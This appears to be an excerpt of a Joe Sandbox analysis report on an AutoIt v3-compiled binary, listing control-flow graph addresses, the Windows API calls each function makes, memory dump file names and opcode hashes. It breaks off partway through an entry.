                                                                                                                                                                                          control_flow_graph 660 732ab0-732ae9 661 732aef-732b05 mciSendStringW 660->661 662 773a1a-773a1b DestroyWindow 660->662 663 732d66-732d73 661->663 664 732b0b-732b13 661->664 665 773a26-773a33 662->665 667 732d75-732d90 UnregisterHotKey 663->667 668 732d98-732d9f 663->668 664->665 666 732b19-732b28 call 732ede 664->666 670 773a35-773a38 665->670 671 773a62-773a69 665->671 681 773a70-773a7c 666->681 682 732b2e-732b36 666->682 667->668 673 732d92-732d93 call 732770 667->673 668->664 669 732da5 668->669 669->663 676 773a44-773a47 FindClose 670->676 677 773a3a-773a42 call 737aab 670->677 671->665 675 773a6b 671->675 673->668 675->681 680 773a4d-773a5a 676->680 677->680 680->671 683 773a5c-773a5d call 7a3cf6 680->683 686 773a86-773a8d 681->686 687 773a7e-773a80 FreeLibrary 681->687 684 773a94-773aa1 682->684 685 732b3c-732b61 call 73e6a0 682->685 683->671 692 773aa3-773ac0 VirtualFree 684->692 693 773ac8-773acf 684->693 697 732b63 685->697 698 732b98-732ba3 OleUninitialize 685->698 686->681 691 773a8f 686->691 687->686 691->684 692->693 695 773ac2-773ac3 call 7a3d5c 692->695 693->684 696 773ad1 693->696 695->693 700 773ad6-773ada 696->700 701 732b66-732b96 call 7330c0 call 733069 697->701 698->700 702 732ba9-732bae 698->702 700->702 703 773ae0-773ae6 700->703 701->698 705 732bb4-732bbe 702->705 706 773aeb-773af8 call 7a3d30 702->706 703->702 709 732da7-732db4 call 74fb19 705->709 710 732bc4-732c45 call 73bd98 call 732ff4 call 732e85 call 750184 call 732e1c call 73bd98 call 73e6a0 call 732eae call 750184 705->710 718 773afa 706->718 709->710 720 732dba 709->720 723 773aff-773b21 call 75013d 710->723 750 732c4b-732c6f call 750184 710->750 718->723 720->709 729 773b23 723->729 732 773b28-773b4a call 75013d 729->732 737 773b4c 732->737 740 773b51-773b73 call 75013d 737->740 746 773b75 740->746 749 773b7a-773b87 call 796e3b 746->749 756 773b89 749->756 750->732 755 732c75-732c99 call 750184 750->755 755->740 760 732c9f-732cb9 call 750184 755->760 759 773b8e-773b9b call 74bdf0 756->759 764 773b9d 759->764 760->749 766 732cbf-732ce3 call 732e85 call 750184 760->766 767 773ba2-773baf call 7a3c8a 764->767 766->759 775 732ce9-732cf1 766->775 773 773bb1 767->773 776 773bb6-773bc3 call 7a3d11 773->776 775->767 777 732cf7-732d15 call 73bd98 call 732fba 775->777 783 773bc5 776->783 777->776 785 732d1b-732d29 777->785 786 773bca-773bd7 call 7a3d11 783->786 785->786 787 732d2f-732d65 call 73bd98 * 3 call 732f26 785->787 791 773bd9 786->791 791->791
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00732AF9
                                                                                                                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 00732B98
                                                                                                                                                                                          • UnregisterHotKey.USER32(?), ref: 00732D7D
                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00773A1B
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00773A80
                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00773AAD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                          • String ID: close all
                                                                                                                                                                                          • API String ID: 469580280-3243417748
                                                                                                                                                                                          • Opcode ID: 2e9873fa5fedf662c3f0df562a82fd58eaf165b144e63aea5b79a9f11be143bf
                                                                                                                                                                                          • Instruction ID: 229c0cd8448658d1214aff44cd7c070bf040b5004367402960d62dde27b9fb69
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e9873fa5fedf662c3f0df562a82fd58eaf165b144e63aea5b79a9f11be143bf
                                                                                                                                                                                          • Instruction Fuzzy Hash: C9D15C71701212DFDB29EF14C849A69F7A0BF04750F1182ADE94A6B263DB38AD13DF84
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 799 7690c5-7690d5 800 7690d7-7690ea call 75f636 call 75f649 799->800 801 7690ef-7690f1 799->801 817 769471 800->817 803 7690f7-7690fd 801->803 804 769459-769466 call 75f636 call 75f649 801->804 803->804 807 769103-76912e 803->807 822 76946c call 762b5c 804->822 807->804 810 769134-76913d 807->810 813 769157-769159 810->813 814 76913f-769152 call 75f636 call 75f649 810->814 815 769455-769457 813->815 816 76915f-769163 813->816 814->822 821 769474-769479 815->821 816->815 820 769169-76916d 816->820 817->821 820->814 825 76916f-769186 820->825 822->817 828 7691a3-7691ac 825->828 829 769188-76918b 825->829 832 7691ae-7691c5 call 75f636 call 75f649 call 762b5c 828->832 833 7691ca-7691d4 828->833 830 769195-76919e 829->830 831 76918d-769193 829->831 836 76923f-769259 830->836 831->830 831->832 861 76938c 832->861 834 7691d6-7691d8 833->834 835 7691db-7691dc call 763b93 833->835 834->835 843 7691e1-7691f9 call 762d38 * 2 835->843 838 76925f-76926f 836->838 839 76932d-769336 call 76fc1b 836->839 838->839 842 769275-769277 838->842 852 769338-76934a 839->852 853 7693a9 839->853 842->839 846 76927d-7692a3 842->846 869 769216-76923c call 7697a4 843->869 870 7691fb-769211 call 75f649 call 75f636 843->870 846->839 850 7692a9-7692bc 846->850 850->839 857 7692be-7692c0 850->857 852->853 855 76934c-76935b GetConsoleMode 852->855 859 7693ad-7693c5 ReadFile 853->859 855->853 860 76935d-769361 855->860 857->839 862 7692c2-7692ed 857->862 864 7693c7-7693cd 859->864 865 769421-76942c GetLastError 859->865 860->859 866 769363-76937d ReadConsoleW 860->866 867 76938f-769399 call 762d38 861->867 862->839 868 7692ef-769302 862->868 864->865 873 7693cf 864->873 871 769445-769448 865->871 872 76942e-769440 call 75f649 call 75f636 865->872 876 76939e-7693a7 866->876 877 76937f GetLastError 866->877 867->821 868->839 881 769304-769306 868->881 869->836 870->861 878 769385-76938b call 75f613 871->878 879 76944e-769450 871->879 872->861 875 7693d2-7693e4 873->875 875->867 886 7693e6-7693ea 875->886 876->875 877->878 878->861 879->867 881->839 889 769308-769328 881->889 892 769403-76940e 886->892 893 7693ec-7693fc call 768de1 886->893 889->839 898 769410 call 768f31 892->898 899 76941a-76941f call 768c21 892->899 904 7693ff-769401 893->904 905 769415-769418 898->905 899->905 904->867 905->904
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 681c728ae1c646966b6030295be07f801f4f7deb7210cb989308a0658792edea
                                                                                                                                                                                          • Instruction ID: a1052d27dc71b6bdc4967c7933d4f443b5e9aaef2ac79d3f585470600ecfeee8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 681c728ae1c646966b6030295be07f801f4f7deb7210cb989308a0658792edea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DC1E370904249EFCF11DFA9D849BADBBB8BF0A310F144159EE16A7392C7789D42CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 943 7335b3-733623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007335E1
                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00733602
                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00733368,?), ref: 00733616
                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00733368,?), ref: 0073361F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$CreateShow
                                                                                                                                                                                          • String ID: AutoIt v3$edit
                                                                                                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                                                                                                          • Opcode ID: 5174feda4c8e42bdfcbcdd28b79841f1d1afc77d47bb16960f5cd9693318b504
                                                                                                                                                                                          • Instruction ID: 29e3e36e7bcb00db65893ad3c105679ce2bc4ceebd8a16ccd9d93e6a7bb662f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5174feda4c8e42bdfcbcdd28b79841f1d1afc77d47bb16960f5cd9693318b504
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3DF0B7716403947AE77157176C0CE372FBDEBC6F50B02402EB904A6270D6A91C51DAB4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0079F2AE
                                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0079F2BC
                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0079F2C4
                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0079F2CE
                                                                                                                                                                                          • Sleep.KERNEL32 ref: 0079F30A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2833360925-0
                                                                                                                                                                                          • Opcode ID: bae1413b862f08494fb202816fbc31e3edb956ce0c353be04aab1594e7a92c95
                                                                                                                                                                                          • Instruction ID: 147035284f570d62fee5b73f410a8437e9cbd1dfa4696f7b845a7532d95f17ba
                                                                                                                                                                                          • Opcode Fuzzy Hash: bae1413b862f08494fb202816fbc31e3edb956ce0c353be04aab1594e7a92c95
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8016971D0161DEBCF10AFA4E849AEEBB78FB08710F06446AE901F2291DB3C9954C7A5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00775287
                                                                                                                                                                                            • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
                                                                                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00736299
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                          • String ID: Line %d: $AutoIt -
                                                                                                                                                                                          • API String ID: 2289894680-4094128768
                                                                                                                                                                                          • Opcode ID: eb979199a954f108456e006a696e24a88187381ff85f20e5587d5166172c77a2
                                                                                                                                                                                          • Instruction ID: 582a7d23abeb0d02ba88cdc396d412f030783a57bc1dd07e63d2bfd3fbf5d83d
                                                                                                                                                                                          • Opcode Fuzzy Hash: eb979199a954f108456e006a696e24a88187381ff85f20e5587d5166172c77a2
                                                                                                                                                                                          • Instruction Fuzzy Hash: A541A5B1408304EAD764EB24DC49EDFB7E8BF45310F00852EF599921A2EF789649C796
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,OVw,0076894C,?,007F9CE8,0000000C,007689AB,?,OVw,?,0077564F), ref: 00768A84
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00768A8E
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00768AB9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                          • String ID: OVw
                                                                                                                                                                                          • API String ID: 490808831-2785480098
                                                                                                                                                                                          • Opcode ID: 361c455979dd0f48f609392e7f57800df4ac58f7a66efcc0aa001284973e024f
                                                                                                                                                                                          • Instruction ID: dca68f6c1d4d6ea8e9e6e17c9d2aa1cf0269069d3d3b4e377b964fdf657db12b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 361c455979dd0f48f609392e7f57800df4ac58f7a66efcc0aa001284973e024f
                                                                                                                                                                                          • Instruction Fuzzy Hash: FF018932605560DACAB062B4EC4AB7E27894B82734F29831AFD178B2C2DF7C8C815582
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,007358BE,SwapMouseButtons,00000004,?), ref: 007358EF
                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,007358BE,SwapMouseButtons,00000004,?), ref: 00735910
                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,007358BE,SwapMouseButtons,00000004,?), ref: 00735932
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID: Control Panel\Mouse
                                                                                                                                                                                          • API String ID: 3677997916-824357125
                                                                                                                                                                                          • Opcode ID: 8854709000306fff6b5359a855f51fc3f7aa3dcc69be8099aedf6a7b6ee893a6
                                                                                                                                                                                          • Instruction ID: 2ea35a65e8c7ec01059c6b0afbecf12c4811127260b6f46b6589eecd2b717cdd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8854709000306fff6b5359a855f51fc3f7aa3dcc69be8099aedf6a7b6ee893a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 38117CB5510618FFEB21CF68CC80EEEB7B8EF00760F108469F801E7210E235AE419764
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Variable must be of type 'Object'., xrefs: 007848C6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                          • API String ID: 0-109567571
                                                                                                                                                                                          • Opcode ID: 544e0314c3c86f8cde652add656881217be59a125f95f91d714224a764e0d991
                                                                                                                                                                                          • Instruction ID: 4c0e557ef6101ab98abcfabda31f38dec8e9ba28fcb7d961301c5e9afb0923a4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 544e0314c3c86f8cde652add656881217be59a125f95f91d714224a764e0d991
                                                                                                                                                                                          • Instruction Fuzzy Hash: 30C2AB71E00609DFEB24DF58C884BADB7B1FF09350F248169E945AB3A2D379AD41CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00743006
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Init_thread_footer
                                                                                                                                                                                          • String ID: CALL$bny
                                                                                                                                                                                          • API String ID: 1385522511-1936831331
                                                                                                                                                                                          • Opcode ID: 993d8131dcb58c75ea8389afe946d39d51ad0388711db714ace6eca7b9176bef
                                                                                                                                                                                          • Instruction ID: c4d2cda18044974bb40bf440b4f8bc4b4a1de04d739ef1dc08079d4427ca00d9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 993d8131dcb58c75ea8389afe946d39d51ad0388711db714ace6eca7b9176bef
                                                                                                                                                                                          • Instruction Fuzzy Hash: C122BE70608201DFC714DF24C884B2ABBF1BF94314F64895DF49A8B3A2D779E956CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007ADB75
                                                                                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007ADB7F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CrackInternet_wcslen
                                                                                                                                                                                          • String ID: |
                                                                                                                                                                                          • API String ID: 596671847-2343686810
                                                                                                                                                                                          • Opcode ID: 65b50a1ce6fa66b26972853ebe5e3606567a1531171475d32635a931cfd4005a
                                                                                                                                                                                          • Instruction ID: 48d489707521bc497c78028708d666f307c89036f71540d45278e99587835446
                                                                                                                                                                                          • Opcode Fuzzy Hash: 65b50a1ce6fa66b26972853ebe5e3606567a1531171475d32635a931cfd4005a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 63317C71801219EFDF55DFA0CC89AEEBFB9FF45314F400029F815A6162EB799A06CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007AD7C2
                                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007AD7EB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$OpenOption
                                                                                                                                                                                          • String ID: <local>
                                                                                                                                                                                          • API String ID: 942729171-4266983199
                                                                                                                                                                                          • Opcode ID: ebbc2b711b9598aa71054eefb73da79a5fe99f74280cd99e2817c45ef234f2d0
                                                                                                                                                                                          • Instruction ID: 16002e1ed27258fac5efe7be9d885519f841eb677f3d73bf6fd48772f2b564a7
                                                                                                                                                                                          • Opcode Fuzzy Hash: ebbc2b711b9598aa71054eefb73da79a5fe99f74280cd99e2817c45ef234f2d0
                                                                                                                                                                                          • Instruction Fuzzy Hash: B011C272205232BAD73C4B668C49EF7BE9DEB537A4F10432AB50A92580D6789C40D6F0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 007509D8
                                                                                                                                                                                            • Part of subcall function 00753614: RaiseException.KERNEL32(?,?,?,007509FA,?,00000000,?,?,?,?,?,?,007509FA,00000000,007F9758,00000000), ref: 00753674
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 007509F5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
